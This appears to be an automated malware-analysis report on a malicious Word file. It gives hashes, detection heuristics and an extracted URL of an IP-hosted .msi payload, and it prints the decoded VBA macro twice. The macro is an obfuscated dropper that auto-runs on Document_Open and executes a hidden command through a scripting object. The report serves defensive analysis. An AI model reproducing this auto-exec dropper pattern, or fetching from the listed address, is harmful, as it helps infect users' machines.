Office (OLE) malware analysis — malicious · 9f0e6c82f18ee8ad

MALICIOUS

Office (OLE)

115.0 KB Created: 2019-08-08 21:14:00 Authoring application: Microsoft Office Word First seen: 2021-04-10

MD5: 0c40f81effccd49a6ce6072b4b4f1672 SHA-1: ee138c7ce8f60adddbf8f48caf5010abcf92b571 SHA-256: 9f0e6c82f18ee8adc7581746ed62f28af9f115cd1a763410976ce6dbc9ba1d90

250 Risk Score

Heuristics 8

ClamAV: Doc.Dropper.Agent-7106146-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-7106146-0
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set IIIIIII3 = CreateObject(WINDOWS1.Label2.Tag)
```
CallByName call high OLE_VBA_CALLBYNAME

CallByName call
Matched line in script
```
CallByName UserForm1, "Show", VbMethod
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Sub Document_Open()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://92.38.135.99/99.msi In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2284 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2284 bytes
SHA-256: `44eec2ccbe993acf8a64593c9f541f1d80108a10b4e7b700a908fd681c44fc24`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Document_Open() On Error Resume Next CallByName UserForm1, "Show", VbMethod End Sub Attribute VB_Name = "WINDOWS1" Attribute VB_Base = "0{8B77C467-D0CE-4F2D-93C1-2297536233FE}{C00E4E7B-4E1D-4073-816D-AB3608D21E91}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub Label7_Click() End Sub Private Sub TextBox1_Change() End Sub Private Sub UserForm_Click() End Sub Attribute VB_Name = "Module11" Public Sub UAC_Enable() Dim PathTo1 As String Dim IIIIIII3 As Object Dim counter1 As Object Dim counter3 As Object Dim counter9 As Object Dim counter As Object Set IIIIIII3 = CreateObject(WINDOWS1.Label2.Tag) Dim counter5 As Object Dim counter6 As Object Dim counter0 As Object Dim counter7 As Object On Error Resume Next Dim counter11 As Object Dim counter12 As Object Dim counter4 As Object CallByName IIIIIII3, "Run", VbMethod, WINDOWS1.Label1.Tag + " " & WINDOWS1.Tag + " ", 0, False Dim counter34 As Object Dim counter8 As Object End Sub Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{0C43AE85-1114-447A-A78C-18B098D76934}{F4122ACE-09F7-4E9A-BA1A-0B10055A9BB4}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub Image1_Click() End Sub Private Sub UserForm_Activate() Dim counter0 As Object Dim counter7 As Object Dim counter11 As Object Dim counter12 As Object UAC_Enable Dim counter5 As Object Dim counter6 As Object Dim counter9 As Object Fal = 2 ActiveDocument.Close Fal > 2 getQue.stionId Application.Quit Fal > 2 Unload Me End Sub Private Sub UserForm_Click() End Sub Private Sub UserForm_Initialize() End Sub

SHA-256: 44eec2ccbe993acf8a64593c9f541f1d80108a10b4e7b700a908fd681c44fc24

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()

On Error Resume Next
CallByName UserForm1, "Show", VbMethod

End Sub
     

Attribute VB_Name = "WINDOWS1"
Attribute VB_Base = "0{8B77C467-D0CE-4F2D-93C1-2297536233FE}{C00E4E7B-4E1D-4073-816D-AB3608D21E91}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Label7_Click()

End Sub

Private Sub TextBox1_Change()

End Sub

Private Sub UserForm_Click()

End Sub




Attribute VB_Name = "Module11"




Public Sub UAC_Enable()
Dim PathTo1 As String
Dim IIIIIII3 As Object

Dim counter1 As Object

Dim counter3 As Object
Dim counter9 As Object
Dim counter As Object
Set IIIIIII3 = CreateObject(WINDOWS1.Label2.Tag)
Dim counter5 As Object
Dim counter6 As Object

Dim counter0 As Object
Dim counter7 As Object
On Error Resume Next


Dim counter11 As Object
Dim counter12 As Object
Dim counter4 As Object

CallByName IIIIIII3, "Run", VbMethod, WINDOWS1.Label1.Tag + " " & WINDOWS1.Tag + " ", 0, False

Dim counter34 As Object
Dim counter8 As Object


End Sub


Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{0C43AE85-1114-447A-A78C-18B098D76934}{F4122ACE-09F7-4E9A-BA1A-0B10055A9BB4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Image1_Click()

End Sub

Private Sub UserForm_Activate()
Dim counter0 As Object
Dim counter7 As Object
Dim counter11 As Object
Dim counter12 As Object
UAC_Enable

Dim counter5 As Object
Dim counter6 As Object
Dim counter9 As Object
Fal = 2

ActiveDocument.Close Fal > 2
getQue.stionId
Application.Quit Fal > 2
Unload Me
End Sub

Private Sub UserForm_Click()

End Sub

Private Sub UserForm_Initialize()

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.